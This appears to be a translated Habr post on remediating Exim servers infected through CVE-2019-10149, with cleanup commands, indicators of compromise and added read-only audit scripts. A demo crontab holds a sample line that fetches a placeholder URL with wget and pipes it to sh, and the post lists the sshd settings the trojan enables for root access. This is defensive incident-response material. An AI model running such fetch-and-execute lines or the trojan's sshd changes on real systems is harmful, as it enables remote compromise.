If you are running Exim versions 4.87 to 4.91 on a mail server, update to version 4.92 urgently, after first stopping Exim itself to avoid being compromised via CVE-2019-10149.
Millions of servers around the world are potentially vulnerable, and the vulnerability is rated critical (CVSS 3.0 base score 9.8/10). An attacker can execute arbitrary commands on the server, in many cases as root.
Make sure you are running the fixed version (4.92) or a version that already has the patch applied.
Or patch the existing version; see the thread.
Update for CentOS 6: see the corresponding thread.
UPD: Ubuntu 18.04 and 18.10 are affected, and updates for them have been released. Versions 16.04 and 19.04 are not affected unless custom options were installed. See the Ubuntu advisory for more details.
We have noticed that the problem described here is being actively exploited (probably by bots) and that some servers (running 4.91) have been infected.
Reading further is only for those who have already understood: you either need to move everything to a clean VPS with fresh software, or look for a cure. Let's try! Please write if anyone has managed to defeat this malware.
If you are an Exim user reading this and have not updated yet (have not made sure that 4.92 or a patched version is running), stop and go update.
For those who have already arrived here, let's continue...
UPD: There may be several different strains of malware. A user for whom the published cure did not work may be treating the wrong thing, without knowing which treatment is actually needed.
The infection shows up like this: [kthrotlds] loads the CPU. On a weak VDS it is at 100%; on a real server it is lower, but still noticeable.
After infecting the machine, the malware removes the existing cron entries, registers only itself to run every 4 minutes, and makes the crontab file immutable. crontab -e cannot save changes and reports an error.
The immutable attribute can be removed, for example like this, after which the command line (1.5 KB) can be deleted:
chattr -i /var/spool/cron/root
crontab -e
Then, in the crontab editor (vim), delete the line and save:
dd
:wq
However, one of the active processes overwrites it again; we are still analyzing.
At the same time there is a pile of active wget (or curl) processes hanging on addresses taken from the installer script (see below). For now we kill them like this, but they start again:
ps aux | grep wge[t]
ps aux | grep cur[l]
echo "Stopping..."
kill -9 `ps aux | grep wge[t] | awk '{print $2}'`
kill -9 `ps aux | grep cur[l] | awk '{print $2}'`
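As an added example (not part of the original post), here is a read-only triage helper for the indicators described above: a crontab entry that runs every 4 minutes and fetches something with wget or curl, and a [kthrotlds] process in the process list. It only reports; it does not kill or delete anything, so it can be run before deciding on cleanup. The file paths, the sample crontab and the sample ps listing are constructed for the demo, and the URL is a placeholder.

```shell
# Added example, not from the original post: read-only triage of the
# indicators the post describes. Sample inputs below are constructed.

# scan_cron_file FILE: print suspicious non-comment crontab lines with their
# line numbers. Returns 0 if at least one was found, 1 otherwise.
scan_cron_file() {
    hits=$(grep -nE 'wget|curl|kthrotlds|\*/4 \* \* \* \*' "$1" 2>/dev/null \
           | grep -vE '^[0-9]+:[[:space:]]*#' || true)
    [ -n "$hits" ] || return 1
    printf '%s: suspicious entries\n%s\n' "$1" "$hits"
    return 0
}

# count_kthrotlds FILE: count [kthrotlds] entries in a saved "ps aux" listing
# (for example: ps aux > /tmp/ps.txt). Prints the count, 0 when none.
count_kthrotlds() {
    [ -r "$1" ] || { echo 0; return; }
    grep -c '\[kthrotlds\]' "$1" || true
}

# --- demo on constructed input ---
demo=$(mktemp -d)
cat > "$demo/root.crontab" <<'EOF'
# constructed sample: an ordinary backup job, must not be flagged
0 3 * * * /usr/local/bin/backup.sh
# constructed sample of the kind of entry the post describes (placeholder URL)
*/4 * * * * wget -q -O - http://example.invalid/x | sh
EOF
cat > "$demo/ps.txt" <<'EOF'
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 169000  9000 ?        Ss   10:00   0:01 /sbin/init
root      4242 99.7  0.0   5000   900 ?        R    10:01   5:12 [kthrotlds]
EOF
scan_cron_file "$demo/root.crontab"
echo "kthrotlds processes in listing: $(count_kthrotlds "$demo/ps.txt")"
rm -rf "$demo"
```

On a real host, point scan_cron_file at /var/spool/cron/root, /etc/crontab and each file under /etc/cron.d, and feed count_kthrotlds a saved ps aux listing; a non-zero count or a flagged entry means the crontab and process list deserve a look before anything is removed.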
The trojan's installer script was found here (CentOS): /usr/local/bin/nptd... We are not posting it, to avoid spreading it, but if anyone who is infected understands shell scripts, study it more carefully.
We will add to this as new information comes in.
UPD 1: Deleting the files (after a preliminary chattr -i) /etc/cron.d/root and /etc/crontab, and rm -Rf /var/spool/cron/root, did not help, nor did stopping the service. Instead, kill crontab completely (rename its binary).
UPD 2: It turns out the trojan installer lives in other places as well; searching by size helps:
find / -size 19825c
UPD 3: Warning! This trojan not only disables selinux, it also puts its own SSH key into ${sshdir}/authorized_keys! It also enables the following fields in /etc/ssh/sshd_config if they are not already set to yes:
PermitRootLogin yes
RSAAuthentication yes
PubkeyAuthentication yes
UsePAM yes
PasswordAuthentication yes
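As an added example (not part of the original post), the two helpers below check for the sshd changes UPD 3 attributes to the trojan: audit_sshd_config reports which of the five directives listed above are set to yes, and unknown_keys lists entries in an authorized_keys file that do not appear in a baseline copy the administrator keeps elsewhere (the baseline itself is an assumption of this example; the post does not mention one). All paths and file contents in the demo are constructed, including the key material.

```shell
# Added example, not from the original post: audit helpers for the sshd
# changes UPD 3 describes. Paths and sample contents are constructed.

# audit_sshd_config FILE: print "Directive value" for each watched directive
# whose value is yes (case-insensitive), skipping comments. Returns 0 if any.
# PubkeyAuthentication yes is the normal default on its own; the signal is the
# combination with a foreign key and PermitRootLogin/PasswordAuthentication yes.
audit_sshd_config() {
    found=$(awk '
        /^[[:space:]]*#/ || NF < 2 { next }
        {
            d = tolower($1); v = tolower($2)
            if ((d == "permitrootlogin" || d == "rsaauthentication" ||
                 d == "pubkeyauthentication" || d == "usepam" ||
                 d == "passwordauthentication") && v == "yes")
                print $1, $2
        }' "$1")
    [ -n "$found" ] || return 1
    printf '%s\n' "$found"
    return 0
}

# unknown_keys BASELINE AUTHORIZED_KEYS: print every key line in
# AUTHORIZED_KEYS whose "type key" pair is not present in BASELINE. A leading
# options field (command="...") is skipped when locating the key type.
# Returns 0 if at least one unknown key was found, 1 otherwise.
unknown_keys() {
    extra=$(awk '
        function keyid(    i) {
            for (i = 1; i < NF; i++)
                if ($i ~ /^(ssh-|ecdsa-|sk-)/) return $i " " $(i + 1)
            return ""
        }
        /^[[:space:]]*#/ || NF < 2 { next }
        FILENAME == ARGV[1] { known[keyid()] = 1; next }
        !(keyid() in known) { print }
    ' "$1" "$2")
    [ -n "$extra" ] || return 1
    printf 'keys not in baseline:\n%s\n' "$extra"
    return 0
}

# --- demo on constructed input ---
demo=$(mktemp -d)
cat > "$demo/sshd_config" <<'EOF'
# constructed sample sshd_config
Port 22
PermitRootLogin yes
PubkeyAuthentication yes
PasswordAuthentication no
UsePAM yes
EOF
cat > "$demo/baseline_keys" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICONSTRUCTEDSAMPLEKEY0001 admin@workstation
EOF
cat > "$demo/authorized_keys" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICONSTRUCTEDSAMPLEKEY0001 admin@workstation
ssh-rsa AAAAB3NzaC1yc2ECONSTRUCTEDSAMPLEKEY0002
EOF
audit_sshd_config "$demo/sshd_config"
unknown_keys "$demo/baseline_keys" "$demo/authorized_keys"
rm -rf "$demo"
```

Run audit_sshd_config against /etc/ssh/sshd_config and unknown_keys against a baseline kept off the host and each user's authorized_keys file (root's included); any key the baseline does not know is exactly what UPD 4 says to remove before sshd is restarted.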
UPD 4: Summary so far: disable Exim and cron (running as root), urgently remove the trojan's key from ssh, edit the sshd config and restart sshd. It is not yet clear whether this will help, but without it there will certainly be trouble.
At readers' suggestion, the important information from the comments about patches and updates has been moved to the top of this note.
UPD 5:
UPD 6:
If anyone has built (or found) a stable solution, please write; you will help a lot of people.
UPD 7:
If nobody has said it yet: the virus comes back thanks to unsent letters in Exim; when Exim tries to send those letters again, it gets restored. Look in /var/spool/exim4.
The whole Exim queue can be cleared like this:
exipick -i | xargs exim -Mrm
Check the number of entries in the queue:
exim -bpc
UPD 8: Again
UPD 9: It seems to go like this. Done it several times already.
The important thing to remember is that the server has already been compromised, and the attacker could have planted something atypical and nasty there (possibly not covered by the toolkit). We therefore recommend moving to a safely installed server (VDS), or at least continuing to monitor the host. If you learn anything new, write it in the comments here. Obviously, not everyone will move to a fresh install...
UPD 10: Thanks again
UPD 11: Yes, (after using any method of fighting this malware) you must reboot. The malware hangs inside one of the open processes, so it stays resident in memory and writes a fresh copy of itself into cron every 30 seconds.
UPD 12:
UPD 13:
UPD 14: Those who are clever and do not run it as root, do not relax: here is one more case where it does not run as root and the hack still happens... I have Debian jessie. UPD: a thread on OrangePi, where Exim runs as Debian-exim, and it still got hacked, the cron was lost, and so on.
UPD 15: When migrating from a compromised server to a clean one, do not forget about hygiene. When transferring data, pay attention not only to executables and configuration files, but also to anything that could contain malicious commands (for example, in MySQL, CREATE TRIGGER, CREATE EVENT and the like). Also do not forget about .html, .js, .php, .py and other public files (ideally these, like the other data, should be restored from a local or other trusted storage).
UPD 16: Here is what everyone needs to check after updating: make sure the new version is actually in use:
exim --version
We worked through their specific situation together. The server was using DirectAdmin and its old da_exim package (an old version without the vulnerability). At the same time, with the help of DirectAdmin's custombuild package manager, a newer and already vulnerable version of Exim had actually been installed. In this particular situation, updating via custombuild helped. Do not forget to make backups before experiments like this, and check before and after the update which version all running Exim processes are.
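As an added example (not part of the original post), the checker below covers the version question in UPD 16 and in the DirectAdmin story above: it takes the first line of exim --version output or a bare version string and reports whether it falls in the 4.87 to 4.91 range the post names as affected. It assumes that line starts with "Exim version X.Y" (the format of the Exim builds I have seen; treat it as an assumption), and it says nothing about patched builds, which keep an older number and must be confirmed separately. The sample version strings are constructed.

```shell
# Added example, not from the original post: is the Exim build in the
# 4.87..4.91 range the post names? Sample strings below are constructed.

# exim_version_from_output TEXT: print the major.minor version found in TEXT
# (either "Exim version 4.91 #1 built ..." or a bare "4.91"), or nothing.
exim_version_from_output() {
    printf '%s\n' "$1" \
        | sed -n -E 's/^(Exim version )?([0-9]+\.[0-9]+).*/\2/p' | head -n 1
}

# exim_in_affected_range TEXT: return 0 if the version in TEXT is 4.87..4.91
# inclusive, 1 if it is outside that range, 2 if no version could be parsed.
exim_in_affected_range() {
    v=$(exim_version_from_output "$1")
    [ -n "$v" ] || return 2
    major=${v%%.*}
    minor=${v#*.}
    if [ "$major" -eq 4 ] && [ "$minor" -ge 87 ] && [ "$minor" -le 91 ]; then
        return 0
    fi
    return 1
}

# check_running_exim: query the exim binary on PATH, if there is one, and
# report. A build outside the range still needs the fix confirmed (a
# distribution patch does not change the version number).
check_running_exim() {
    command -v exim >/dev/null 2>&1 || { echo "no exim binary in PATH"; return 2; }
    line=$(exim --version 2>/dev/null | head -n 1)
    if exim_in_affected_range "$line"; then
        echo "AFFECTED RANGE: $line"
        return 0
    fi
    echo "not in affected range (still confirm the build carries the fix): $line"
    return 1
}

# --- demo on constructed version strings, then on the real binary if present ---
for sample in 'Exim version 4.91 #1 built 10-Jun-2019 12:00:00' 4.92 4.86 5.0; do
    if exim_in_affected_range "$sample"; then
        echo "affected range:     $sample"
    else
        echo "not affected range: $sample"
    fi
done
check_running_exim || true
```

Because the post stresses that the running processes, not just the installed package, matter (the da_exim versus custombuild case), run check_running_exim on the host both before and after the update, and compare its answer with the binaries the running exim processes were started from.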
Source: habr.com